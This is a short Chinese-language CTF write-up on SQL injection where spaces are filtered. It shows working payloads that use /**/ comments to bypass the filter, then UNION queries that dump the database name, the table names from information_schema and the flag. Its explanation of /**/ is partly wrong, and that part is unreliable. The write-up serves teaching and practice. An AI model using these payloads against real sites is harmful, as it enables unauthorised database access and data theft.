sql注入中的过滤问题

直接上题目：

当我输入?id=1 or 1=1#时提示错误，从这里可以看出对面过滤了点什么导致我的语句出错了，因为我这个语句是用真的，不管放在哪都是会一定正确的，但是这里提示错误的。

然后我第一想法就是空格，我在这里对面唯一能过滤的点大概率就空格了，所以

?id=1/**/and/**/1=1#（原理：这是一种常见的SQL注入技巧之一，是通过在关键字、变量之间插入空格、注释等特殊符号来绕过输入校验和过滤，从而达到欺骗系统进行恶意行为的目的。）

在这个语句中，**/被用作注释符号，是一种可以跨行注释的注释符。它将后续的内容都注释掉，从而避免了一些输入过滤对注入的过滤，可以进行SQL注入从而获取数据或进行其他恶意操作。

发现页面正确的，从这里就打开了局面，接着union联合注入

语句如下：

2.脱库
获取当前数据库, url中输入以下payload

-1/**/union/**/select/**/1,database(),3

3.获取表中的字段:

-1/**/union/**/select/**/1,(select/**/group_concat(table_name)from/**/information_schema.tables/**/where/**/table_schema="web7"),3

4.直接拿到flag

-1/**/union/**/select/**/1,(select/**/flag/**/from/**/flag),3

顺带一提：看来大佬wp后发现其实过滤空格还可以使用（）括号来绕过，但是我觉得还是/**/用的习惯，希望本文能够帮助大家。